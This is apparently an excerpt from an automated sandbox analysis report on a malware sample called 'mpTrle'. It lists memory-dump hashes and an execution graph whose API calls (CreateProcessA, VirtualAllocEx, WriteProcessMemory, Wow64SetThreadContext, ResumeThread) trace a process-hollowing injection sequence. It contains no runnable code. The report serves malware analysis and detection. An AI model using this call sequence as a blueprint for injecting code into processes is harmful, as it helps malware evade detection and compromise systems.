                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d13919db28d396fac5ac34b76ee8da174f3e946df0db376bec12d7ad23e0ab0a
                                                      • Instruction ID: 3600ef64a2228995dc768974b2ea8e8e5a55132c3e48f065e0c65c0692c6b1d2
                                                      • Opcode Fuzzy Hash: d13919db28d396fac5ac34b76ee8da174f3e946df0db376bec12d7ad23e0ab0a
                                                      • Instruction Fuzzy Hash: BC113C31B001288FCB549AB8D858AEF7AEAFBC8351F10453AD40AE7354DA65AC018BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2056269ac982b6dfe0351b48e20c7dff556a2ca3992307f5f2c3aba9636197f7
                                                      • Instruction ID: 55ce58f47f813c42f12b117b33f4b40b66b1beb7cd5307267c9a611ae4e7931e
                                                      • Opcode Fuzzy Hash: 2056269ac982b6dfe0351b48e20c7dff556a2ca3992307f5f2c3aba9636197f7
                                                      • Instruction Fuzzy Hash: 3D01D435B041100FCB229679A464BAF6BE6EBC6720F10897AE18FC7341DE21DC034781
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56687ce55c7224ef71dcf1010c8a232757d0a49e9b0b9e216aa8fe90c44d99e3
                                                      • Instruction ID: d0b8899ae0b062b18b0e52fbe0d0952ecedb7c9f39416d1004f4d2b2224107af
                                                      • Opcode Fuzzy Hash: 56687ce55c7224ef71dcf1010c8a232757d0a49e9b0b9e216aa8fe90c44d99e3
                                                      • Instruction Fuzzy Hash: 0021CFB1D01219AFDB00DF9AD884ADEFFB8FB49310F50852AE918A7200C374A954CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7cfdb566be549572ef0b96e60f36bd4d3ab447523e218621c1d91af3fbf36910
                                                      • Instruction ID: 241f1ad76a33b4315395d4caa3cd3c58c8b8e6e83a706bc7c710d93f6840b66f
                                                      • Opcode Fuzzy Hash: 7cfdb566be549572ef0b96e60f36bd4d3ab447523e218621c1d91af3fbf36910
                                                      • Instruction Fuzzy Hash: 1A21F2B5D012599FDB01CFAAD884ADEFFB4FB49310F10822AE918A7200C374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.448860375.000000000029D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0029D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_29d000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction ID: 4e55d0178719ab67830598054d26346677f1c732c31324750ef0222dfe931be7
                                                      • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                      • Instruction Fuzzy Hash: 59119A75504280DFDB11CF24D9C4B15FFA1FB84314F28C6AAD8494B656C33AD86ADFA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91bf289a235cab278f2b165902e1dd42c831b9388bce76aa904cb1a4c9ee47d5
                                                      • Instruction ID: fea58fa89af2fb66bc39ae5a949346643e4b4ff497378bb55b3da3308e6de6e7
                                                      • Opcode Fuzzy Hash: 91bf289a235cab278f2b165902e1dd42c831b9388bce76aa904cb1a4c9ee47d5
                                                      • Instruction Fuzzy Hash: 0D016131E012148FCB26EFB984461AEBBF5EF89311F258479D405EB249EA35C9418B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cdbe226461e664eae71d64e0267faf47aeed3a222ab88305cf10c7edb38ef795
                                                      • Instruction ID: a3ec3319b59190921f08c0aee99eac8e840400694f337b9f5eefd3e33c18e6c4
                                                      • Opcode Fuzzy Hash: cdbe226461e664eae71d64e0267faf47aeed3a222ab88305cf10c7edb38ef795
                                                      • Instruction Fuzzy Hash: 0601D8317081644FCB11DA38A86576ABBE5EB86310F10957EE04ACB352EA25EC0687C5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40c5f6c60d0b1b64188eba7c86b7a1005b82612a52b74822373830e00f5bd46f
                                                      • Instruction ID: 9489ea06cd8132ea2b4466d6294394b6bcfc73841510078f5da3415743e349cf
                                                      • Opcode Fuzzy Hash: 40c5f6c60d0b1b64188eba7c86b7a1005b82612a52b74822373830e00f5bd46f
                                                      • Instruction Fuzzy Hash: 6A01A735B041104FEB259ABD9455BAFBBD6EBD5710F14883AE18ECB342DA31DC028B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7c6d18b97b824165bd893e79177c39b1bae011fdb665b7be276afe3dc6345d7f
                                                      • Instruction ID: 0628845fc283793c56f0378654cf457f249ccff631562b332fdc75bf1c538a15
                                                      • Opcode Fuzzy Hash: 7c6d18b97b824165bd893e79177c39b1bae011fdb665b7be276afe3dc6345d7f
                                                      • Instruction Fuzzy Hash: 2901A732B500145FCF5599B8C865BEF7BAAFBC8350F01453AD40AD7384EE649D0687D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 125ee7d64cd87e5d03771df806016a738becafa2df8f391356e4e675bd6ac655
                                                      • Instruction ID: 546ff18a2cc8a0de80efc88b822a064e96cb4dc65050e02c3e4cc0d613fccfe0
                                                      • Opcode Fuzzy Hash: 125ee7d64cd87e5d03771df806016a738becafa2df8f391356e4e675bd6ac655
                                                      • Instruction Fuzzy Hash: E011ACB1D01619AFDB00DF9AD884ADEFBB8FB49350F50852AE918A7310C374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f04339a10fccd3caedccec66ce2b9483458e5168bbf65b190350b3c73c9ef72e
                                                      • Instruction ID: a47845c4a37ddee9f89f96492d3e5521df4ba37c087a6e7e6d89e8fcff7a180b
                                                      • Opcode Fuzzy Hash: f04339a10fccd3caedccec66ce2b9483458e5168bbf65b190350b3c73c9ef72e
                                                      • Instruction Fuzzy Hash: 4F013135B001144FEB249ABE9459B6FABDAEBD9720F10883AE14ECB345DD75EC024B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ecbb39df830499c8c9fbdf54d72464f1f4ed2e3d3bb006cbda83e72857889f75
                                                      • Instruction ID: 95e0b969fde44d7b1d669abc5be6f31eb04c901e449995467e1c0f9fe6b6891b
                                                      • Opcode Fuzzy Hash: ecbb39df830499c8c9fbdf54d72464f1f4ed2e3d3bb006cbda83e72857889f75
                                                      • Instruction Fuzzy Hash: 9801AF31B001144BDB259A7DA858B6F67DAEBC9720F20883AF24ECB340EE21EC034795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fab55d55affc88f058d80927383f3226bd7172e98b5706bea7433f102de9c383
                                                      • Instruction ID: c28f740bc62926865f61a55115fde68bad960d6e512ed6b59d89705dfb4e2a85
                                                      • Opcode Fuzzy Hash: fab55d55affc88f058d80927383f3226bd7172e98b5706bea7433f102de9c383
                                                      • Instruction Fuzzy Hash: 7C014431B001244FDB10EA79E85576BB7DAEBC5715F109439E50AC7345EA25ED0287C5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d05e758229a7fed34004075447a68f7eeead75c1b8145294720986454d9aa95
                                                      • Instruction ID: 69ba6dfcdc7c456feb30afffc18c9dcc5eed0a974900240440a5f459f222fb2c
                                                      • Opcode Fuzzy Hash: 5d05e758229a7fed34004075447a68f7eeead75c1b8145294720986454d9aa95
                                                      • Instruction Fuzzy Hash: 8501717491834C9FC701EFF1F886A9C7FB1EB85211B4085B9D1099F255DE306E098B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec08c0d5186fecc5a6356beee6bed54c1bf2d44f26f9e1a654a0d8108b7bc22c
                                                      • Instruction ID: c33b7af28504493bfc0e40e7afe476e3735c253649382280b040dbad00e3c1b0
                                                      • Opcode Fuzzy Hash: ec08c0d5186fecc5a6356beee6bed54c1bf2d44f26f9e1a654a0d8108b7bc22c
                                                      • Instruction Fuzzy Hash: 73F03174A1430C9FDB40FFF5F88AA6D7BB1EB84311B508579D2099B254DE706E498B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13073295b3857edb09f09d224e370bcdb0e53ca8d3fbce325fb57fff0cca27f2
                                                      • Instruction ID: 99b80976c8f2930a03847a3d13f4ad609a063c1acc6be3a7b073382a13a262c3
                                                      • Opcode Fuzzy Hash: 13073295b3857edb09f09d224e370bcdb0e53ca8d3fbce325fb57fff0cca27f2
                                                      • Instruction Fuzzy Hash: A2F08235A04124CFCB349E40E9847ECBBB5FF40325F245861D801D7394C3709D82CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:14%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:106
                                                      Total number of Limit Nodes:0
                                                      execution_graph 10537 bf0808 10538 bf056c 10537->10538 10540 bf057b 10538->10540 10543 bf13aa 10538->10543 10557 bf13b8 10538->10557 10539 bf0638 10544 bf13d2 10543->10544 10554 bf13da 10544->10554 10571 bf20dd 10544->10571 10576 bf1b04 10544->10576 10584 bf208a 10544->10584 10589 bf1b92 10544->10589 10594 bf1e15 10544->10594 10599 bf1855 10544->10599 10603 bf1c17 10544->10603 10608 bf1af8 10544->10608 10613 bf1ada 10544->10613 10618 bf1e3b 10544->10618 10622 bf215c 10544->10622 10554->10539 10558 bf13d2 10557->10558 10559 bf20dd 2 API calls 10558->10559 10560 bf215c 2 API calls 10558->10560 10561 bf1e3b 2 API calls 10558->10561 10562 bf1ada 2 API calls 10558->10562 10563 bf1af8 2 API calls 10558->10563 10564 bf1c17 2 API calls 10558->10564 10565 bf1855 CreateProcessA 10558->10565 10566 bf1e15 2 API calls 10558->10566 10567 bf1b92 2 API calls 10558->10567 10568 bf13da 10558->10568 10569 bf208a 2 API calls 10558->10569 10570 bf1b04 4 API calls 10558->10570 10559->10568 10560->10568 10561->10568 10562->10568 10563->10568 10564->10568 10565->10568 10566->10568 10567->10568 10568->10539 10569->10568 10570->10568 10572 bf20e6 10571->10572 10627 38f7d9 10572->10627 10631 38f7e0 10572->10631 10573 bf2289 10577 bf1b1e 10576->10577 10578 bf1aa7 10576->10578 10635 38f588 10577->10635 10639 38f581 10577->10639 10579 bf1b7a 10578->10579 10643 38ec28 10578->10643 10647 38ec20 10578->10647 10579->10554 10585 bf2097 10584->10585 10587 38ec28 ResumeThread 10585->10587 10588 38ec20 ResumeThread 10585->10588 10586 bf2178 10587->10586 10588->10586 10590 bf1b98 10589->10590 10651 38f938 10590->10651 10655 38f940 10590->10655 10591 bf1bbb 10591->10554 10595 bf1daa 10594->10595 10596 bf1de3 10594->10596 10597 38f7d9 WriteProcessMemory 10595->10597 10598 38f7e0 WriteProcessMemory 10595->10598 10596->10554 10597->10596 10598->10596 10600 bf186f 10599->10600 10659 bf0040 10600->10659 10604 bf1c24 10603->10604 10606 38f7d9 WriteProcessMemory 10604->10606 10607 38f7e0 WriteProcessMemory 10604->10607 10605 bf1de3 10605->10554 10606->10605 10607->10605 10609 bf1d7a 10608->10609 10663 bf24d0 10609->10663 10668 bf24c0 10609->10668 10610 bf1d96 10614 bf1ae0 10613->10614 10615 bf2178 10614->10615 10616 38ec28 ResumeThread 10614->10616 10617 38ec20 ResumeThread 10614->10617 10616->10615 10617->10615 10620 38f7d9 WriteProcessMemory 10618->10620 10621 38f7e0 WriteProcessMemory 10618->10621 10619 bf1a4c 10619->10554 10620->10619 10621->10619 10623 bf20ec 10622->10623 10625 38f7d9 WriteProcessMemory 10623->10625 10626 38f7e0 WriteProcessMemory 10623->10626 10624 bf2289 10625->10624 10626->10624 10628 38f82c WriteProcessMemory 10627->10628 10630 38f8cb 10628->10630 10630->10573 10632 38f82c WriteProcessMemory 10631->10632 10634 38f8cb 10632->10634 10634->10573 10636 38f5d1 Wow64SetThreadContext 10635->10636 10638 38f64f 10636->10638 10638->10578 10640 38f5d1 Wow64SetThreadContext 10639->10640 10642 38f64f 10640->10642 10642->10578 10644 38ec6c ResumeThread 10643->10644 10646 38ecbe 10644->10646 10646->10579 10648 38ec6c ResumeThread 10647->10648 10650 38ecbe 10648->10650 10650->10579 10652 38f98c ReadProcessMemory 10651->10652 10654 38fa0a 10652->10654 10654->10591 10656 38f98c ReadProcessMemory 10655->10656 10658 38fa0a 10656->10658 10658->10591 10660 bf00c7 CreateProcessA 10659->10660 10662 bf0325 10660->10662 10664 bf24e5 10663->10664 10673 38f6b8 10664->10673 10677 38f6b0 10664->10677 10665 bf2504 10665->10610 10669 bf24e5 10668->10669 10671 38f6b8 VirtualAllocEx 10669->10671 10672 38f6b0 VirtualAllocEx 10669->10672 10670 bf2504 10670->10610 10671->10670 10672->10670 10674 38f6fc VirtualAllocEx 10673->10674 10676 38f77a 10674->10676 10676->10665 10678 38f6fc VirtualAllocEx 10677->10678 10680 38f77a 10678->10680 10680->10665

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1055 bf0040-bf00d9 1057 bf00db-bf00f2 1055->1057 1058 bf0122-bf014a 1055->1058 1057->1058 1063 bf00f4-bf00f9 1057->1063 1061 bf014c-bf0160 1058->1061 1062 bf0190-bf01e6 1058->1062 1061->1062 1073 bf0162-bf0167 1061->1073 1071 bf022c-bf0323 CreateProcessA 1062->1071 1072 bf01e8-bf01fc 1062->1072 1064 bf011c-bf011f 1063->1064 1065 bf00fb-bf0105 1063->1065 1064->1058 1068 bf0109-bf0118 1065->1068 1069 bf0107 1065->1069 1068->1068 1070 bf011a 1068->1070 1069->1068 1070->1064 1091 bf032c-bf0411 1071->1091 1092 bf0325-bf032b 1071->1092 1072->1071 1080 bf01fe-bf0203 1072->1080 1074 bf018a-bf018d 1073->1074 1075 bf0169-bf0173 1073->1075 1074->1062 1077 bf0177-bf0186 1075->1077 1078 bf0175 1075->1078 1077->1077 1081 bf0188 1077->1081 1078->1077 1082 bf0226-bf0229 1080->1082 1083 bf0205-bf020f 1080->1083 1081->1074 1082->1071 1085 bf0213-bf0222 1083->1085 1086 bf0211 1083->1086 1085->1085 1088 bf0224 1085->1088 1086->1085 1088->1082 1104 bf0413-bf0417 1091->1104 1105 bf0421-bf0425 1091->1105 1092->1091 1104->1105 1108 bf0419 1104->1108 1106 bf0427-bf042b 1105->1106 1107 bf0435-bf0439 1105->1107 1106->1107 1109 bf042d 1106->1109 1110 bf043b-bf043f 1107->1110 1111 bf0449-bf044d 1107->1111 1108->1105 1109->1107 1110->1111 1112 bf0441 1110->1112 1113 bf044f-bf0478 1111->1113 1114 bf0483-bf048e 1111->1114 1112->1111 1113->1114 1117 bf048f 1114->1117 1117->1117
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BF0307
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449996318.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_bf0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 7d48872c6bbfbec5564262b375b6b96025ab3cf4b0bf23c6cca50fa5da4f0a81
                                                      • Instruction ID: a828c27bcf142abd52f2f6cbdd6d266ed448aff43653e9c4588278a22019e0b9
                                                      • Opcode Fuzzy Hash: 7d48872c6bbfbec5564262b375b6b96025ab3cf4b0bf23c6cca50fa5da4f0a81
                                                      • Instruction Fuzzy Hash: DBC103B1D0022D8FDB24DFA4C845BEDBBF1BB49300F1091A9E919B7250DB749A89CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1231 38f7d9-38f84b 1233 38f84d-38f85f 1231->1233 1234 38f862-38f8c9 WriteProcessMemory 1231->1234 1233->1234 1236 38f8cb-38f8d1 1234->1236 1237 38f8d2-38f924 1234->1237 1236->1237
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F8B3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: da71722f444ef8ef1725dd7d66a6a1d364a1bfa7127380ae28cbc09728f745d6
                                                      • Instruction ID: 67402546043aa88d9fa5387dfcf3c965cd8ed0007a56272c160a3b532a033640
                                                      • Opcode Fuzzy Hash: da71722f444ef8ef1725dd7d66a6a1d364a1bfa7127380ae28cbc09728f745d6
                                                      • Instruction Fuzzy Hash: 0541AAB5D012589FDF00CFA9D984AEEBBF1BF49300F20942AE814BB210D334AA45CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1242 38f7e0-38f84b 1244 38f84d-38f85f 1242->1244 1245 38f862-38f8c9 WriteProcessMemory 1242->1245 1244->1245 1247 38f8cb-38f8d1 1245->1247 1248 38f8d2-38f924 1245->1248 1247->1248
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F8B3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: f3b22e599943021bbee7e0f865d97bbe8536708f682614e17788de305ea74e7a
                                                      • Instruction ID: 09797064acfaebcef13f31aeb129d602a35aba21094c981de6423a8c9f9d733b
                                                      • Opcode Fuzzy Hash: f3b22e599943021bbee7e0f865d97bbe8536708f682614e17788de305ea74e7a
                                                      • Instruction Fuzzy Hash: 8541ABB5D012589FDF00DFA9D984ADEBBF1BF49310F20942AE814BB210D335AA45CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1253 38f938-38fa08 ReadProcessMemory 1256 38fa0a-38fa10 1253->1256 1257 38fa11-38fa63 1253->1257 1256->1257
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F9F2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 82df049c3ec2bffff442145075bb882d5bb6e8859815c7bdd0ffba2bf0df2487
                                                      • Instruction ID: 5fed3b00e7d8b015230e187594be2ba9ef0b5c46883d2b857c23fd86da54af67
                                                      • Opcode Fuzzy Hash: 82df049c3ec2bffff442145075bb882d5bb6e8859815c7bdd0ffba2bf0df2487
                                                      • Instruction Fuzzy Hash: 1641A6B8D002589FDF10CFA9D884AEEFBB1BF49310F20942AE815BB210D375A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1262 38f940-38fa08 ReadProcessMemory 1265 38fa0a-38fa10 1262->1265 1266 38fa11-38fa63 1262->1266 1265->1266
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F9F2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: d5a7be3759a9939008f4538818968a05503e5f46524c300ce658fcdef3f47b3d
                                                      • Instruction ID: 212f9754513e3dac6b564d86f027167449a5a9128c60218c6fa815d928e35c10
                                                      • Opcode Fuzzy Hash: d5a7be3759a9939008f4538818968a05503e5f46524c300ce658fcdef3f47b3d
                                                      • Instruction Fuzzy Hash: DD4198B8D002589FCF00DFA9D884AEEFBB5BB49310F20942AE814B7210D775A945DF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1271 38f6b0-38f778 VirtualAllocEx 1274 38f77a-38f780 1271->1274 1275 38f781-38f7cb 1271->1275 1274->1275
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038F762
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 968a50a6bf5a4baec8b8b3e295c9e3242075514b7e99492f8ca7499d82f1cf6c
                                                      • Instruction ID: f40ac4565c23c9c3960cd3b6cf742fe75cd7a319c2e18b71cd4fcafb9b6d2e3c
                                                      • Opcode Fuzzy Hash: 968a50a6bf5a4baec8b8b3e295c9e3242075514b7e99492f8ca7499d82f1cf6c
                                                      • Instruction Fuzzy Hash: 9741A8B8D002589FDF10CFA9D984AEEFBB1BF49310F20942AE814BB210D375A905CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1280 38f6b8-38f778 VirtualAllocEx 1283 38f77a-38f780 1280->1283 1284 38f781-38f7cb 1280->1284 1283->1284
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038F762
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: e08e700bf09a9ea8d407adb8d6e7fdb24e22d002ca090c8826d9091c47630726
                                                      • Instruction ID: a57b2fde0c0af2114c5e29c8478fbee9037df5eda3cd9d84b4992bb16d3f75cb
                                                      • Opcode Fuzzy Hash: e08e700bf09a9ea8d407adb8d6e7fdb24e22d002ca090c8826d9091c47630726
                                                      • Instruction Fuzzy Hash: 2E4197B8D00258DFDF10CFA9D984ADEBBB5BB49310F20942AE814BB210D775A905CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1289 38f581-38f5e8 1291 38f5ea-38f5fc 1289->1291 1292 38f5ff-38f64d Wow64SetThreadContext 1289->1292 1291->1292 1294 38f64f-38f655 1292->1294 1295 38f656-38f6a2 1292->1295 1294->1295
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038F637
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
